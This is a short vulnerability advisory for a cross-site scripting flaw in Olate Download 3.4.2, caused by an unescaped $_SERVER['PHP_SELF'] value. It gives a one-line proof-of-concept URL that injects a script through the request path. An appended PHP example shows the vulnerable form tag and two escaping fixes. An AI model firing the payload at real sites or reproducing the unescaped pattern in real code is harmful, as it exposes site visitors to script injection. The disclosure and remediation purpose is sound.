-Summary-
Software: Olate Download
Software Web Site: http://www.olate.co.uk/
Versions: 3.4.2
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei addmimistrator
Risk Level: Middle

-Description-
Olate Download is prone to cross-site scripting because it trusts an unsafe variable, $_SERVER[PHP_SELF]. The development team assumed that $_SERVER[PHP_SELF] contains only the path of the PHP file being executed; in fact it also carries any trailing path information sent by the client, so it is attacker-controlled. I was reading the bug report of this issue on the PHP support site; it was reported as a bug, but the support team accepted it as a documentation bug.

Related code lies at line 386 of uim.php:

$global_vars[php_self] = $_SERVER[PHP_SELF];

-Exploit-
olate/files.php/fffffff%22%3E%3Cscript%3E alert(1)%3C/script%3Ef/?cat=1

-Solution-
No updates available.

-Credit-
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com
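The following PHP snippet is an added illustration of the root cause described above and of two ways to close it; it is not Olate Download's code. The $request array is a constructed stand-in for $_SERVER, populated with the decoded payload from the exploit line, and the form_action_* function names are hypothetical.

```php
<?php
// Added example (not Olate Download's code): shows why echoing
// $_SERVER['PHP_SELF'] into HTML is dangerous and how to render it safely.
// $request is a constructed stand-in for $_SERVER. PHP_SELF includes the
// client-controlled PATH_INFO, so everything after "files.php/" is copied
// into the variable verbatim (the payload is the advisory's, URL-decoded).
$request = [
    'SCRIPT_NAME' => '/olate/files.php',
    'PHP_SELF'    => '/olate/files.php/fffffff"><script> alert(1)</script>f/',
];

// Vulnerable pattern: the untrusted value is placed in an HTML attribute
// unescaped, so the embedded double quote closes the attribute and the
// rest of the payload is rendered as markup.
function form_action_vulnerable(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

// Fix 1: escape on output. ENT_QUOTES is required here because the value
// sits inside a double-quoted attribute; the default flags leave single
// quotes alone but double quotes are encoded either way.
function form_action_escaped(array $server): string
{
    $self = htmlspecialchars($server['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

// Fix 2: avoid PHP_SELF altogether. SCRIPT_NAME is the path of the script
// that actually ran and does not include PATH_INFO. It is still output
// into HTML, so it is still escaped.
function form_action_script_name(array $server): string
{
    $self = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

// Render all three so the difference is visible in the page source:
// only the first one reproduces the <script> element from the request.
echo form_action_vulnerable($request), PHP_EOL;
echo form_action_escaped($request), PHP_EOL;
echo form_action_script_name($request), PHP_EOL;
```

Running the file with the PHP CLI prints the three form tags; only the first contains an unencoded `<script>` element, which is what a browser would execute when the same value arrives in a real request path.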